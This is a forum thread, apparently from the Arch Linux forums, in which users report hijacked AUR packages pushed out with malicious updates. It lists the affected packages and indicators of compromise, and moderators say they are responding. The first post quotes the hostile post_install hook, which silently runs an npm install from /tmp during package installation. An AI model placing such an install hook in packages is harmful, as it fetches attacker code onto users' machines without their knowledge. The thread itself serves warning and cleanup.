You are not logged in.

#1 Today 15:32:48

darthvader
Member
From: The Beehive
Registered: 2013-12-14
Posts: 21

multiple malicious AUR updates

i just received multiple emails regarding packages i used to contribute to, with malicous updates, they all have this new .install file(or similar):

+post_install() {{
+  cd /tmp
+  npm install atomic-lockfile axios cosmiconfig uuid
+}}

packages: perl-alien-wxwidgets, premake-git, smenu, git-annex-standalone, panwriter, smenu, fatx, vbam-git, ipfs-desktop-bin

this is active and ongoing, they've been taken over by new accounts with random names and random emails.

Last edited by darthvader (Today 16:10:00)

Offline

#2 Today 15:35:16

yochananmarqos
Member
Registered: 2020-02-05
Posts: 222

Re: multiple malicious AUR updates

Yes, there has been quite a flood in the last hour or so. See the recent aur-general posts.

Offline

#3 Today 15:38:17

gromit
Administrator
From: Germany
Registered: 2024-02-10
Posts: 1,536
Website

Re: multiple malicious AUR updates

The Moderation team is aware and a few of the moderators are already cleaning things up!

Offline

#4 Today 16:08:57

xsmile
Member
Registered: 2012-03-31
Posts: 33

Re: multiple malicious AUR updates

Noticed it as well. Indicators of compromise can be:
- a new systemd user service with a random name pointing to the hidden malicious binary
- a shell script at ~/.local/bin/sudo for stealing passwords
- tor network traffic

Offline

#5 Today 16:16:43

deadYokai
Member
From: Ukraine
Registered: Today
Posts: 1
Website

Re: multiple malicious AUR updates

i have same with python-openai-harmony package


// Truth is distributed, not fixed.

Offline

#7 Today 17:24:24

gromit
Administrator
From: Germany
Registered: 2024-02-10
Posts: 1,536
Website

Re: multiple malicious AUR updates

We have a filter script to find those, see the example here: https://github.com/archlinux/contrib/pull/108

Offline

Board footer

Powered by FluxBB